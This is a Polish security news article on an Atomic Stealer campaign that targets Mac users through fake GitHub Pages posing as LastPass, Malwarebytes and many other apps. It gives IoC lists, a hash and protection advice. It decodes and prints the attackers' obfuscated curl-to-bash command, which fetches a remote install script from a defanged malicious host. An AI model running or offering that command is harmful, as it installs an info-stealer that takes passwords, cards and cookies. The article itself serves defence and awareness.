W sieci pojawiła się poważna kampania malware’owa, w której cyberprzestępcy podszywają się pod znane marki (m.in. Malwarebytes, LastPass). Na liście ofiar znajdują się również inne popularne aplikacje i usługi – antywirusy czy narzędzia do edycji wideo.
Atak został tym razem wymierzony w użytkowników systemów MacOS i jego celem jest kradzież informacji. Dystrybucja złośliwego oprogramowania odbywa się za pomocą GitHub. Podszywanie się pod znane marki jest dość powszechne, ponieważ dzięki temu, przestępcy mają ułatwione zadanie dotarcia do potencjalnych odbiorców.
Badacze z firmy Malwarebytes oraz LastPass przeprowadzili analizę zagrożenia i w poniższym artykule przybliżę tę problematykę.
Czasami takie ataki wykorzystują reklamy Google, które są proponowane jako pierwsze na liście i prowadzą do złośliwych stron. W tym przypadku jednak, atakujący posłużyli się Githubem i dostępnymi w ramach niego Github Pages. Do tego zapewne były użyte techniki SEO, aby złośliwe strony były bardziej widoczne w wyszukiwarkach.
Strony te udają repozytoria popularnego oprogramowania, oferując szybkie pobranie. Strona zawiera przycisk Pobierz, po kliknięciu, którego użytkownik jest przenoszony na stronę z instrukcją instalacji fałszywego produktu. Przestępcy odkryli, że najłatwiejszym sposobem na zainfekowanie komputerów Mac jest skłonienie użytkowników do samodzielnego zainstalowania złośliwego oprogramowania
Mechanizm ataku
Poprzez wykonanie tej komendy, jest pobierany a następnie uruchamiany skrypt z zewnętrznego serwera. Ważne jest, że te komendy omijają standardowe zabezpieczenia macOS i nie prosi o dodatkowe potwierdzenia a ni nie wyświetla ostrzeżeń, a więc użytkownik nie ma szansy weryfikacji co dany skrypt wykonuje. W efekcie na komputerze instalowany jest Atomic Stealer. Jest to typowy info-stealer, który kradnie hasła, dane kart płatniczych, pliki cookie oraz inne wrażliwe informacje, aby potem sprzedać je na czarnym rynku.
1. Polecenie /bin/bash -c „<coś>” uruchamia komendę za pomocą powłoki Bash na systemie macOS lub Linux.
2. Część w cudzysłowie używa $( … ), co oznacza, że wszystko wewnątrz jest wykonywane w pierwszej kolejności, a jego wynik staje się częścią polecenia zewnętrznego.
3. Wewnętrzne polecenie: $(echo aHR0cHM6Ly9nb3NyZWVzd………YWxsLnNo | base64 -d) dekodowało długi ciąg znaków.
4. Zdekodowane polecenie wewnętrzne okazało się następujące: curl -fsSL https://gosreestr[.]com/hun/install.sh.
◦ curl -fsSL to komenda do pobierania danych z sieci. Opcje oznaczają: -f (ciche niepowodzenie przy błędach HTTP), -s (tryb cichy, bez paska postępu), -S (pokazuj błędy, jeśli użyto -s), oraz -L (podążaj za przekierowaniami).
5. Całe polecenie zewnętrzne brzmiało: /bin/bash -c „$(curl -fsSL https://gosreestr[.]com/hun/install.sh)”.
Lista aplikacji, które były wykorzystane w ataku to:
| Kategoria | Przykłady aplikacji/usług |
| Bezpieczeństwo i hasła | Malwarebytes, LastPass, 1Password, SentinelOne |
| Finanse i trading | Bitpanda, Charles Schwab, Citibank, E-TRADE, Fidelity, Gemini, Robinhood, Webull |
| Edycja i multimedia | After Effects, Audacity, DaVinci Resolve, Mp3tag, Reaper, Soundtrap, VSCO |
| Produktywność i narzędzia | Notion, Obsidian, Raycast, Thunderbird, TweetDeck, Zotero |
| Marketing i social media | Hootsuite, Metricool, SocialPilot, Viraltag |
| Inne | Docker, Dropbox, IRS, Shopify, XSplit |
Lastpass publikuje również listę Indicators of Compromise (IoCs)
URLs:
- github[.]com/lastpass-on-macbook
- github[.]com/LastPass-on-MacBook/lastpass-premium-mac-download
- ahoastock825[.]github[.]io/.github/lastpass
- macprograms-pro[.]com/mac-git-2-download.html
- bonoud[.]com/get3/install.sh
- bonoud[.]com/get3/update
- github[.]com/Zengo-Wallet-Desktop-App-on-Macbook
- github[.]com/1password-on-Macbook-Desktop
- github[.]com/1Password-Premium-on-MacBook
- github[.]com/ActiveCampaign-Desktop-on-Mac
- github[.]com/ActiveCampaign-MacBook-Desktop-App
- github[.]com/After-Effects-Desktop-on-Mac
- github[.]com/Audacity-on-Macbook
- github[.]com/Auphonic-Desktop-on-Mac
- github[.]com/Basecamp-App-macOS-Installation
- github[.]com/BetterSnapTool-on-MacBook
- github[.]com/Biteable-Desktop-on-Mac
- github[.]com/Bitpanda-on-MacBook
- github[.]com/Bitsgap-Download-Mac
- github[.]com/Blog2Social-Desktop-on-Mac
- github[.]com/Blue-Wallet-Desktop-on-Mac
- github[.]com/Bonkbot-On-Macbook
- github[.]com/Carbon-Copy-Cloner-on-MacBook
- github[.]com/Carbon-Copy-Cloner-on-MacBook
- github[.]com/Charles-Schwab-Desktop-on-MacBook
- github[.]com/Citibank-on-MacBook-Desktop-App
- github[.]com/CMC-Markets-on-MacBook
- github[.]com/Confluence-on-MacBook
- github[.]com/Coolors-Desktop-on-Mac
- github[.]com/DaVinci-Resolve-on-MacBook
- github[.]com/DefiLlama-on-Mac-Desktop-App
- github[.]com/Desktop-Clockology-Mac-Os
- github[.]com/Desygner-Desktop-on-Mac
- github[.]com/Docker-MacBook-Desktop-App
- github[.]com/Dropbox-on-Macbook
- github[.]com/EigenLayer-Desktop-App-on-MacBook
- github[.]com/EigenLayer-Desktop-App-on-MacBook
- github[.]com/EigenLayer-Desktop-App-on-MacBook
- github[.]com/E-TRADE-on-MacBook
- github[.]com/Fidelity-on-MacBook
- github[.]com/Fliki-Desktop-on-Mac
- github[.]com/Freqtrade-Bot-on-Macbook
- github[.]com/Freshworks-App-on-MacBook
- github[.]com/Gemini-on-MacBook
- github[.]com/GMGN-AI-Desktop-App-On-MacBook
- github[.]com/Gunbot-Desktop-on-Macbook
- github[.]com/Hemingway-Editor-Desktop-on-Mac
- github[.]com/HeyGen-Desktop-on-Mac
- github[.]com/Hootsuite-MacBook-Desktop-App
- github[.]com/HTX-App-on-MacBook-Download
- github[.]com/Hypertracker-Desktop-on-Mac
- github[.]com/IRS-Desktop-App-on-Macbook
- github[.]com/KeyBank-on-Mac-Desktop
- github[.]com/Lightstream-Desktop-on-Mac
- github[.]com/Loopback-on-MacBook
- github[.]com/Maestro-Bot-Desktop-on-Macbook
- github[.]com/Melon-Desktop-on-Mac
- github[.]com/Metatrader-5-Download-on-Mac
- github[.]com/Metricool-Desktop-on-Mac
- github[.]com/Mixpanel-on-MacBook
- github[.]com/Mp3tag-Desktop-on-Mac
- github[.]com/Mural-App-on-MacBook
- github[.]com/NFT-Creator-on-Macbook
- github[.]com/NotchNook-Download-on-Mac
- github[.]com/Notion-Download-on-Mac
- github[.]com/Obsidian-on-Macbook
- github[.]com/Onlypult-Desktop-on-Mac
- github[.]com/Pendle-Finance-Desktop-on-Mac
- github[.]com/Pepperstone-on-MacBook
- github[.]com/Pipedrive-on-Mac-Desktop-App
- github[.]com/Plus500-on-MacBook
- github[.]com/Privnote-on-MacBook
- github[.]com/ProWritingAid-Desktop-on-Mac
- github[.]com/Publer-Desktop-on-Mac
- github[.]com/Raycast-App-on-Mac
- github[.]com/Raycast-Download-on-Mac
- github[.]com/Reaper-Desktop-on-Mac
- github[.]com/RecurPost-Desktop-on-Mac
- github[.]com/Renderforest-Desktop-on-Mac
- github[.]com/Rippling-App-on-MacBook
- github[.]com/Riverside-fm-Desktop-on-Mac
- github[.]com/Robinhood-Desktop-on-MacBook
- github[.]com/Rug-AI-on-Macbook
- github[.]com/Sage-Intacct-on-Mac-Desktop-App
- github[.]com/Salesloft-on-MacBook
- github[.]com/SentinelOne-on-MacBook
- github[.]com/Shippo-on-MacBook
- github[.]com/Shopify-on-MacBook
- github[.]com/SocialPilot-Desktop-on-Mac
- github[.]com/Soundtrap-Desktop-on-Mac
- github[.]com/StreamYard-Desktop-on-Mac
- github[.]com/SurferSEO-Desktop-on-Mac
- github[.]com/Thunderbird-on-MacBook
- github[.]com/TweetDeck-Desktop-on-Mac
- github[.]com/Uphold-App-on-MacBook
- github[.]com/Uphold-App-on-MacBook
- github[.]com/Veeva-CRM-on-MacBook
- github[.]com/Viraltag-Desktop-on-Mac
- github[.]com/VSCO-Desktop-on-Mac
- github[.]com/Vyond-Desktop-on-Mac
- github[.]com/Webull-on-Macbook
- github[.]com/Xai-Games-App-on-MacBook
- github[.]com/XSplit-Desktop-on-Mac
- github[.]com/Zealy-Desktop-on-MacBook
- github[.]com/Zencastr-Desktop-on-Mac
- github[.]com/Zenefits-on-MacBook
- github[.]com/Zotero-7-on-MacBook
SHA256 Hash:
- e52dd70113d1c6eb9a09eafa0a7e7bcf1da816849f47ebcdc66ec9671eb9b350 (Atomic Stealer)
Co zrobić, żeby się uchronić?
- Przede wszystkim nie pobieraj nic z nieoficjalnych źródeł, najlepiej pobieraj oprogramowanie bezpośrednio ze strony producenta.
- Nie uruchamiaj nieświadomie komend curl | bash. Weryfikuj kod komendy przed wykonaniem.
- Używaj antywirusa z modułem monitorowania pobierania lub oprogramowanie EDR.
- Nie klikaj w sponsorowane wyniki wyszukiwania (reklamy Google). Pomocne będzie zainstalowanie wtyczki uBlockOrigin, który ukryje wszystkie reklamy.
A jeśli już jesteś zainfekowany?
- Sprawdź i usuń podejrzane elementy w Login Items, LaunchAgents i Launch Daemons z Biblioteki aby zapobiec rozprzestrzeniania się złośliwego oprogramowania po restarcie.
- Zmień wszystkie hasła i włącz MFA wszędzie tam, gdzie to możliwe
- Jeśli nadal zauważasz problemy, rozważ ponowną instalację systemu macOS. Pamiętaj, że kopie zapasowe w TimeMachine też mogą być już zainfekowane.
Źródła:
https://blog.lastpass.com/posts/attack-targeting-macs-via-github-pages
